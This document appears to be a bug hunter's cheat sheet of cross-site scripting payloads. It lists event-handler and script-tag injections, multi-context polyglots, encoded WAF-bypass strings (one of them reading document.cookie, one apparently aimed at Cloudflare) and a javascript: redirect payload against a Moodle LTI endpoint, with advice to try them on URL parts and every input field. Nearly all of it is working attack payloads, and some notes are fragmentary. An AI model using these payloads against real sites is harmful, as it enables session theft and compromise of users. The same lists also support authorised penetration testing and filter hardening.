<img src=x>
<img src=x>
"><svg/onload=alert`1`>
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)
*********************************
comibine payload xss,ssti/csti,xss
'"<svg/onload=prompt(5);>{{7*7}}
*****************************************
Try it on:
- URL query, fragment & path;
- all input fields.
***********************************************************************************
Comment as a payload xss:-
https%3A%2F%2Fptop.only.wip.la%3A443%2Fhttp%2Ffoo%3F%26apos%3B-alert%281%29-%26apos%3B i.e URL http://foo?'-
alert(1)-'
**********************************************************************************
if input string is reflected in var tempelate literal
like
var message = `0 search results for 'hello'`;
```
***********************************************************************************
***********************
### Multi-context polyglot payload (Mathias Karlsson)
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
***********************************************************************************
******
XSS waf bypass:
Final payload:
<ifram%0de src=jav%0dascript:alert(document.cookie)>
*********************************************************
mmodle xss
example[.]com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
***************************************************************
Getting WAFs in exploiting XSS? Try these:
1. ">'><details/open/ontoggle=confirm('XSS')>
2. '';!--"<XSS>=&{()}
3. <!--><script>alert/**/()/**/</script>
*************************************************************
polygot: jaVasCript:/*-/*`/*\`/*'/*"/*%0D%0A%0d%0a*/(/* */oNcliCk=alert()
)//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3ciframe/<iframe/oNloAd=alert()//>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/
oNloAd=alert()//>\x3e
*******************************************************************
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]
['domain'])%2F%2F
<iframe+/ON+onload=%20alert(/str0d/)>
Cloudflare